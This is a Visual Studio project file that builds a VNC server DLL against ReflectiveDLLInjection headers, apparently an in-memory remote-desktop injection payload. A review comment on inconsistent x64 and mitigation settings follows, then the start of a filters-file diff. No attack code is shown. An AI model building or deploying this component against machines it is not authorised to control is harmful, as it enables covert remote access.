<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
|
||||||
|
</ImportGroup>
|
||||||
|
<PropertyGroup Label="UserMacros" />
|
||||||
|
<PropertyGroup>
|
||||||
|
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<IgnoreImportLibrary>true</IgnoreImportLibrary>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<EmbedManifest>false</EmbedManifest>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<TargetExt>.dll</TargetExt>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<IgnoreImportLibrary>true</IgnoreImportLibrary>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<EmbedManifest>false</EmbedManifest>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<TargetExt>.dll</TargetExt>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<IgnoreImportLibrary>true</IgnoreImportLibrary>
|
||||||
|
<LinkIncremental>true</LinkIncremental>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<TargetExt>.dll</TargetExt>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<IgnoreImportLibrary>true</IgnoreImportLibrary>
|
||||||
|
<LinkIncremental>true</LinkIncremental>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<TargetExt>.dll</TargetExt>
|
||||||
|
</PropertyGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<Midl>
|
||||||
|
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MkTypLibCompatible>true</MkTypLibCompatible>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<TargetEnvironment>Win32</TargetEnvironment>
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<StringPooling>true</StringPooling>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<BrowseInformation>true</BrowseInformation>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<CompileAs>Default</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<Culture>0x0409</Culture>
|
||||||
|
</ResourceCompile>
|
||||||
|
<PreLinkEvent>
|
||||||
|
<Command />
|
||||||
|
</PreLinkEvent>
|
||||||
|
<Link>
|
||||||
|
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
|
||||||
|
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
|
||||||
|
<MapExports>true</MapExports>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention>false</DataExecutionPrevention>
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<Midl>
|
||||||
|
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MkTypLibCompatible>true</MkTypLibCompatible>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<TargetEnvironment>X64</TargetEnvironment>
|
||||||
|
<GenerateTypeLibrary>false</GenerateTypeLibrary>
|
||||||
|
<HeaderFileName />
|
||||||
|
<DllDataFileName />
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x64__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<StringPooling>true</StringPooling>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<BrowseInformation>true</BrowseInformation>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<CompileAs>Default</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<Culture>0x0409</Culture>
|
||||||
|
</ResourceCompile>
|
||||||
|
<PreLinkEvent>
|
||||||
|
<Command />
|
||||||
|
</PreLinkEvent>
|
||||||
|
<Link>
|
||||||
|
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
|
||||||
|
<SuppressStartupBanner>false</SuppressStartupBanner>
|
||||||
|
<ManifestFile />
|
||||||
|
<MapExports>false</MapExports>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<RandomizedBaseAddress />
|
||||||
|
<DataExecutionPrevention />
|
||||||
|
<TargetMachine>NotSet</TargetMachine>
|
||||||
|
<AllowIsolation>true</AllowIsolation>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<Midl>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MkTypLibCompatible>true</MkTypLibCompatible>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<TargetEnvironment>Win32</TargetEnvironment>
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<BufferSecurityCheck>true</BufferSecurityCheck>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<CompileAs>Default</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<Culture>0x0809</Culture>
|
||||||
|
</ResourceCompile>
|
||||||
|
<Link>
|
||||||
|
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
|
||||||
|
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention />
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<Midl>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MkTypLibCompatible>true</MkTypLibCompatible>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<TargetEnvironment>X64</TargetEnvironment>
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<BufferSecurityCheck>true</BufferSecurityCheck>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<CompileAs>Default</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<Culture>0x0809</Culture>
|
||||||
|
</ResourceCompile>
|
||||||
|
<Link>
|
||||||
|
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
|
||||||
|
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||||
|
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention />
|
||||||
|
<TargetMachine>MachineX64</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="vncdll.cpp" />
|
||||||
|
<ClCompile Include="vncEncodeCoRRE.cpp" />
|
||||||
|
<ClCompile Include="vncEncodeHexT.cpp" />
|
||||||
|
<ClCompile Include="vncEncoder.cpp" />
|
||||||
|
<ClCompile Include="vncEncodeRRE.cpp" />
|
||||||
|
<ClCompile Include="vncEncodeTight.cpp" />
|
||||||
|
<ClCompile Include="vncEncodeZlib.cpp" />
|
||||||
|
<ClCompile Include="vncEncodeZlibHex.cpp" />
|
||||||
|
<ClCompile Include="omnithread\nt.cpp" />
|
||||||
|
<ClCompile Include="libjpeg\jcapimin.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcapistd.c" />
|
||||||
|
<ClCompile Include="libjpeg\jccoefct.c" />
|
||||||
|
<ClCompile Include="libjpeg\jccolor.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcdctmgr.c" />
|
||||||
|
<ClCompile Include="libjpeg\jchuff.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcinit.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcmainct.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcmarker.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcmaster.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcomapi.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcparam.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcphuff.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcprepct.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcsample.c" />
|
||||||
|
<ClCompile Include="libjpeg\jctrans.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdapimin.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdapistd.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdatadst.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdatasrc.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdcoefct.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdcolor.c" />
|
||||||
|
<ClCompile Include="libjpeg\jddctmgr.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdhuff.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdinput.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdmainct.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdmarker.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdmaster.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdmerge.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdphuff.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdpostct.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdsample.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdtrans.c" />
|
||||||
|
<ClCompile Include="libjpeg\jerror.c" />
|
||||||
|
<ClCompile Include="libjpeg\jfdctflt.c" />
|
||||||
|
<ClCompile Include="libjpeg\jfdctfst.c" />
|
||||||
|
<ClCompile Include="libjpeg\jfdctint.c" />
|
||||||
|
<ClCompile Include="libjpeg\jidctflt.c" />
|
||||||
|
<ClCompile Include="libjpeg\jidctfst.c" />
|
||||||
|
<ClCompile Include="libjpeg\jidctint.c" />
|
||||||
|
<ClCompile Include="libjpeg\jidctred.c" />
|
||||||
|
<ClCompile Include="libjpeg\jmemmgr.c" />
|
||||||
|
<ClCompile Include="libjpeg\jmemnobs.c" />
|
||||||
|
<ClCompile Include="libjpeg\jquant1.c" />
|
||||||
|
<ClCompile Include="libjpeg\jquant2.c" />
|
||||||
|
<ClCompile Include="libjpeg\jutils.c" />
|
||||||
|
<ClCompile Include="zlib\adler32.c" />
|
||||||
|
<ClCompile Include="zlib\compress.c" />
|
||||||
|
<ClCompile Include="zlib\crc32.c" />
|
||||||
|
<ClCompile Include="zlib\deflate.c" />
|
||||||
|
<ClCompile Include="zlib\infblock.c" />
|
||||||
|
<ClCompile Include="zlib\infcodes.c" />
|
||||||
|
<ClCompile Include="zlib\inffast.c" />
|
||||||
|
<ClCompile Include="zlib\inflate.c" />
|
||||||
|
<ClCompile Include="zlib\inftrees.c" />
|
||||||
|
<ClCompile Include="zlib\infutil.c" />
|
||||||
|
<ClCompile Include="zlib\maketree.c" />
|
||||||
|
<ClCompile Include="zlib\trees.c" />
|
||||||
|
<ClCompile Include="zlib\uncompr.c" />
|
||||||
|
<ClCompile Include="zlib\zutil.c" />
|
||||||
|
<ClCompile Include="d3des.c" />
|
||||||
|
<ClCompile Include="DynamicFn.cpp" />
|
||||||
|
<ClCompile Include="FileTransferItemInfo.cpp" />
|
||||||
|
<ClCompile Include="MinMax.cpp" />
|
||||||
|
<ClCompile Include="RectList.cpp" />
|
||||||
|
<ClCompile Include="stdhdrs.cpp" />
|
||||||
|
<ClCompile Include="tableinitcmtemplate.cpp">
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="tableinittctemplate.cpp">
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="tabletranstemplate.cpp">
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="translate.cpp" />
|
||||||
|
<ClCompile Include="TsSessions.cpp" />
|
||||||
|
<ClCompile Include="VideoDriver.cpp" />
|
||||||
|
<ClCompile Include="vncauth.c" />
|
||||||
|
<ClCompile Include="vncBuffer.cpp" />
|
||||||
|
<ClCompile Include="vncClient.cpp" />
|
||||||
|
<ClCompile Include="vncDesktop.cpp" />
|
||||||
|
<ClCompile Include="vncInstHandler.cpp" />
|
||||||
|
<ClCompile Include="vncKeymap.cpp" />
|
||||||
|
<ClCompile Include="vncRegion.cpp" />
|
||||||
|
<ClCompile Include="vncServer.cpp" />
|
||||||
|
<ClCompile Include="vncService.cpp" />
|
||||||
|
<ClCompile Include="vncSockConnect.cpp" />
|
||||||
|
<ClCompile Include="VSocket.cpp" />
|
||||||
|
<ClCompile Include="WallpaperUtils.cpp" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="omnithread\nt.h" />
|
||||||
|
<ClInclude Include="omnithread\omnithread.h" />
|
||||||
|
<ClInclude Include="common.h" />
|
||||||
|
<ClInclude Include="libjpeg\jchuff.h" />
|
||||||
|
<ClInclude Include="libjpeg\jconfig.h" />
|
||||||
|
<ClInclude Include="libjpeg\jdct.h" />
|
||||||
|
<ClInclude Include="libjpeg\jdhuff.h" />
|
||||||
|
<ClInclude Include="libjpeg\jerror.h" />
|
||||||
|
<ClInclude Include="libjpeg\jinclude.h" />
|
||||||
|
<ClInclude Include="libjpeg\jmemsys.h" />
|
||||||
|
<ClInclude Include="libjpeg\jmorecfg.h" />
|
||||||
|
<ClInclude Include="libjpeg\jpegint.h" />
|
||||||
|
<ClInclude Include="libjpeg\jpeglib.h" />
|
||||||
|
<ClInclude Include="libjpeg\jversion.h" />
|
||||||
|
<ClInclude Include="zlib\deflate.h" />
|
||||||
|
<ClInclude Include="zlib\infblock.h" />
|
||||||
|
<ClInclude Include="zlib\infcodes.h" />
|
||||||
|
<ClInclude Include="zlib\inffast.h" />
|
||||||
|
<ClInclude Include="zlib\inffixed.h" />
|
||||||
|
<ClInclude Include="zlib\inftrees.h" />
|
||||||
|
<ClInclude Include="zlib\infutil.h" />
|
||||||
|
<ClInclude Include="zlib\trees.h" />
|
||||||
|
<ClInclude Include="zlib\zconf.h" />
|
||||||
|
<ClInclude Include="zlib\zlib.h" />
|
||||||
|
<ClInclude Include="zlib\zutil.h" />
|
||||||
|
<ClInclude Include="AdministrationControls.h" />
|
||||||
|
<ClInclude Include="d3des.h" />
|
||||||
|
<ClInclude Include="DynamicFn.h" />
|
||||||
|
<ClInclude Include="FileTransferItemInfo.h" />
|
||||||
|
<ClInclude Include="IncomingConnectionsControls.h" />
|
||||||
|
<ClInclude Include="InputHandlingControls.h" />
|
||||||
|
<ClInclude Include="keysymdef.h" />
|
||||||
|
<ClInclude Include="MatchWindow.h" />
|
||||||
|
<ClInclude Include="MinMax.h" />
|
||||||
|
<ClInclude Include="PollControls.h" />
|
||||||
|
<ClInclude Include="QuerySettingsControls.h" />
|
||||||
|
<ClInclude Include="RectList.h" />
|
||||||
|
<ClInclude Include="resource.h" />
|
||||||
|
<ClInclude Include="rfb.h" />
|
||||||
|
<ClInclude Include="rfbproto.h" />
|
||||||
|
<ClInclude Include="SharedDesktopArea.h" />
|
||||||
|
<ClInclude Include="stdhdrs.h" />
|
||||||
|
<ClInclude Include="translate.h" />
|
||||||
|
<ClInclude Include="TsSessions.h" />
|
||||||
|
<ClInclude Include="VideoDriver.h" />
|
||||||
|
<ClInclude Include="vncAbout.h" />
|
||||||
|
<ClInclude Include="vncauth.h" />
|
||||||
|
<ClInclude Include="vncBuffer.h" />
|
||||||
|
<ClInclude Include="vncClient.h" />
|
||||||
|
<ClInclude Include="vncDesktop.h" />
|
||||||
|
<ClInclude Include="vncEncodeCoRRE.h" />
|
||||||
|
<ClInclude Include="vncEncodeHexT.h" />
|
||||||
|
<ClInclude Include="vncEncoder.h" />
|
||||||
|
<ClInclude Include="vncEncodeRRE.h" />
|
||||||
|
<ClInclude Include="vncEncodeTight.h" />
|
||||||
|
<ClInclude Include="vncEncodeZlib.h" />
|
||||||
|
<ClInclude Include="vncEncodeZlibHex.h" />
|
||||||
|
<ClInclude Include="vncInstHandler.h" />
|
||||||
|
<ClInclude Include="vncKeymap.h" />
|
||||||
|
<ClInclude Include="vncPasswd.h" />
|
||||||
|
<ClInclude Include="vncRegion.h" />
|
||||||
|
<ClInclude Include="vncServer.h" />
|
||||||
|
<ClInclude Include="vncService.h" />
|
||||||
|
<ClInclude Include="vncSockConnect.h" />
|
||||||
|
<ClInclude Include="VSocket.h" />
|
||||||
|
<ClInclude Include="VTypes.h" />
|
||||||
|
<ClInclude Include="WallpaperUtils.h" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<Text Include="README.TXT" />
|
||||||
|
</ItemGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
</ImportGroup>
|
||||||
|
</Project>
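Review bot: The Debug|x64 configuration is built with 32-bit settings: its ClCompile preprocessor list defines `__x86__` where Release|x64 defines `__x64__`, and its Link group passes `/MACHINE:I386` in AdditionalOptions alongside `<TargetMachine>MachineX64</TargetMachine>`, which contradict each other. Change the define to `__x64__;` to match Release|x64 and drop the `<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>` line from that Link group (the Release|x64 group already omits it). Separately, both Release configurations set `<BufferSecurityCheck>false</BufferSecurityCheck>`, and Release|Win32 additionally sets `<RandomizedBaseAddress>false</RandomizedBaseAddress>` and `<DataExecutionPrevention>false</DataExecutionPrevention>` where Release|x64 leaves both empty, so the two platforms ship with different mitigations. If the reflective loader genuinely needs /GS off (its code runs before its own relocations are applied, so a stack-cookie reference to an absolute global can fault), record that in an XML comment next to the property so nobody re-enables it blindly, and make the ASLR/DEP choices match across platforms.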
|
|
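--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,527 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup>
+<Filter Include="Source Files">
+<UniqueIdentifier>{804c711f-35c6-4aac-9b8a-9cf8b528de85}</UniqueIdentifier>
+<Extensions>.cpp, .c</Extensions>
+</Filter>
+<Filter Include="Source Files\encoder">
+<UniqueIdentifier>{7847cf33-fe03-48ad-9a94-a8956821f343}</UniqueIdentifier>
+<Extensions>.cpp, .c</Extensions>
+</Filter>
+<Filter Include="Source Files\omnithread">
+<UniqueIdentifier>{a328f948-40d7-4548-9451-66b620124477}</UniqueIdentifier>
+</Filter>
+<Filter Include="Source Files\libjpeg">
+<UniqueIdentifier>{cb642898-1056-43ee-828a-40004b207331}</UniqueIdentifier>
+</Filter>
+<Filter Include="Source Files\zlib">
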